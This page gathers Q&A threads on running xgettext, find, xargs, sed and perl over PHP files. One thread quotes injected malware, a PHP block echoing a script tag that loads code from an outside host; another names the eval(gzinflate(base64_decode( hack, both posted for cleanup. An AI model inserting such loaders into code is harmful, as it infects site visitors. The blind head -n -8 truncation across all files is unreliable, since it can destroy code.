How to use xgettext how to parse directory? - php

in manual there are a option -D for parse directory but when i do `xgettext -D /home/cawa/www/zf2/' i have en error the input file is missing?

The answer was
find /home/cawa/www/deploy/module/Nav/ -type f \( -name '*.php' -or -name '*.phtml' \) -print > list
xgettext --files-from=list --language=PHP -j messages.po

You could use this cmd to recursively get all files in a directory.
find . -iname "*.py" | xargs xgettext --from-code utf-8 -o messages.pot

Related

Remove malware in php file

All my .php file was appended a block of code like this:
<?php
#bbf007#
if(empty($r)) {
$r = "<script type=\"text/javascript\" src=\"http://web- ask.esy.es/m2nzgpzt.php?id=11101326\"></script>";
echo $r;
}
#/bbf007#
?>
I need to write a bash script with regular expression to remove this block out of code file. Please help me a suggestion.
Backup first!
The following will take all but the last 8 lines from all .php files within the current directory and it's subdirectories, and write them to a file called *.php.new:
find -name "*.php" | xargs -i sh -c 'head -n -8 {} > {}.new'
Then, move all the current php files to *.php.old:
find -name "*.php" | xargs -i sh -c 'mv {} {}.old'
Then, move the .php.new files to .php
find -name "*.php.new" | xargs -i sh -c 'mv {} `echo '{}' | head -c -5`'

Linux sed command replace string not working

My wordpress site has been infected with the eval(gzinflate(base64_decode(' hack.
I would like to ssh into the server and find replace all of these lines within my php files with nothing.
I tried the following command:
find . -name "*.php" -print | xargs sed -i 'MY STRING HERE'
I think this is not working because the string has / characters within it which I think need to be escaped.
Can someone please let me know how to escape these characters?
Thanks in advance.
I haven't tried so BACKUP YOUR FILES FIRST! As mentioned in some of the comments, this is not the best idea, it might be better to try some other approaches. Anyhow, what about this?
find . -name "*.php" -type f -exec sed -i '/eval(gzinflate(base64_decode(/d' {} \;
if you have perl available :
perl -p -i'.bck' -e 's/oldstring/newstring/g' `find ./ -name *.php`
=> all files modified will have a backup (suffix '.bck')
Bash offers different delimiters such as # % | ; : / in sed substitute command.
Hence, when the substitution involves one of the delimiters mentioned, any of the other delimiters can be used in the sed command so that there is no need to escape the delimiter involved.
Example:
When the replacement/substitution involves "/", the following can be used:
sed 's#/will/this/work#/this/is/working#g' file.txt
Coming to your question, your replacement/substitution involves "/", hence you can use any of the other delimiters.
find . -name "*.php" -print | xargs sed -i 's#/STRING/TO/BE/REPLACED#/REPLACEMENT/STRING#g'

I need way to find all files containing odd ^M invisible characters

I know for a fact that these PHP files exist. I can open them in VIM and see the offending character.
I found several links here on stackoverflow that suggest remedies for this but none of them work properly. I know for a fact that several files do not contain the ^M characters (CRLF line endings) however, I keep getting false positives.
find . -type f -name "*.php" -exec fgrep -l $'\r' "{}" \;
Returns false positives.
find . -not -type d -name "*.php" -exec file "{}" ";" | grep CRLF
Returns nothing.
etc...etc...
Edit: Yes, I am executing these lines in the offending directory.
Do you use a source control repository for storing your files? Many of them have the ability to automatically make sure that line endings of files are correct upon commit. I can give you an example with Subversion.
I have a pre-commit hook that allows me to specify what properties in Subversion must be on what files in order for those files to be committed. For example, I could specify that any file that ends in *.php must have the property svn:eol-style set to LF.
If you use this, you'll never have an issue with the ^M line endings again.
As for finding them, I've been able to do this:
$ find . -type f -exec egrep -l "^M$" {} \;
Where ^M is a Control-M. With Bash or Kornshell, you can get that by pressing Control-V, then Control-M. You might have to have set -o vi for it to work.
A little Perl can not only reveal the files but change them as desired. To find your culprits, do:
find . -type f -name "*.php" -exec perl -ne 'print $ARGV if m{\r$}' {} + > badstuff
Now, if you want to remove the pesky carriage return:
perl -pe 's{\r$}{}' $(<badstuff)
...which eliminates the carriage return from all of the affected files. If you want to do that and create a backup copy too, do:
perl -pi.old -e 's{\r$}{}' $(<badstuff)
I tend to use the instructions provided at http://kb.iu.edu/data/agiz.html to do this. The following will change the ^M in a specific file to a \n return and place that into a new file using tr:
tr '\r' '\n' < macfile.txt > unixfile.txt
This does the same thing just using perl instead. With this one you can probably pipe in a series of files:
perl -p -e 's/\r/\n/g' < macfile.txt > unixfile.txt
The file command will tell you which kinds of line-end characters it sees:
$ file to-do.txt
to-do.txt: ASCII text, with CRLF line terminators
$ file mixed.txt
mixed.txt: ASCII text, with CRLF, LF line terminators
So you could run e.g.
find . -type f -name "*.php" -exec file "{}" \; | grep -c CRLF
to count the number of files that have at least some CRLF line endings.
You could also use dos2unix or fromdos to convert them all to LF only:
find . -type f -name "*.php" -exec dos2unix "{}" \;
You might also care if these tools would touch all of the files, or just the ones that have to be converted; check the tool documentation

Verifying PHP syntax in an entire directory, with xargs

ls -1 *.php | xargs php -l doesn't work, any clues why ? (it only checks the first file)
I am trying to detect parse errors in my whole application.
Thank you.
EDIT:
Came up with this, it is sufficient for my needs:
#!/bin/sh
for chave in `find . | grep .php` ; do
php -l $chave
done
find . -name '*.php' -print0 | xargs -0 -L 1 php -l
This has the added bonus of working no matter what characters your filenames contain. Unfortunately I'm not sure why it's not working without the -L 1 part :(
Only print the once that fails:
find . -name '*.php' -print0 | xargs -0 -L 1 php -l | grep -v 'No syntax errors detected in ./'

Recursive xgettext?

How can I compile a .po file using xgettext with PHP files with a single command recursively?
My PHP files exist in a hierarchy, and the straight xgettext command doesn't seem to dig down recursively.
Got it:
find . -iname "*.php" | xargs xgettext
I was trying to use -exec before, but that would only run one file at a time. This runs them on the bunch.
Yay Google!
For WINDOWS command line a simpe solution is:
#echo off
echo Generating file list..
dir html\wp-content\themes\wpt\*.php /L /B /S > %TEMP%\listfile.txt
echo Generating .POT file...
xgettext -k_e -k__ --from-code utf-8 -o html\wp-content\themes\wpt\lang\wpt.pot -L PHP --no-wrap -D html\wp-content\themes\wpt -f %TEMP%\listfile.txt
echo Done.
del %TEMP%\listfile.txt
You cannot achieve this with one single command. The xgettext option --files-from is your friend.
find . -name '*.php' >POTFILES
xgettext --files-from=POTFILES
If you are positive that you do not have too many source files you can also use find with xargs:
find . -name "*.php" -print0 | xargs -0 xgettext
However, if you have too many source files, xargs will invoke xgettext multiple times so that the maximum command-line length of your platform is not exceeded. In order to protect yourself against that case you have to use the xgettext option -j, --join-existing, remove the stale messages file first, and start with an empty one so that xgettext does not bail out:
rm -f messages.po
echo >messages.po
find . -name "*.php" -print0 | xargs -0 xgettext --join-existing
Compare that with the simple solution given first with the list of source files in POTFILES!
Using find with --exec is very inefficient because it will invoke xgettext -j once for every source file to search for translatable strings. In the particular case of xgettext -j it is even more inefficient because xgettext has to read the evergrowing existing output file messages.po with every invocation (that is with every input source file).
Here's a solution for Windows. At first, install gettext and find from the GnuWin32 tools collection.
http://gnuwin32.sourceforge.net/packages/gettext.htm
gnuwin32.sourceforge.net/packages/findutils.htm
You can run the following command afterwards:
find /source/directory -iname "*.php" -exec xgettext -j -o /output/directory/messages.pot {} ;
The output file has to exist prior to running the command, so the new definitions can be merged with it.
This is the solution I found for recursive search on Mac:
xgettext -o translations/messages.pot --keyword=gettext `find . -name "*.php"`
Generates entries for all uses of method gettext in files whose extension is php, including subfolders and inserts them in translations/messages.pot .

Categories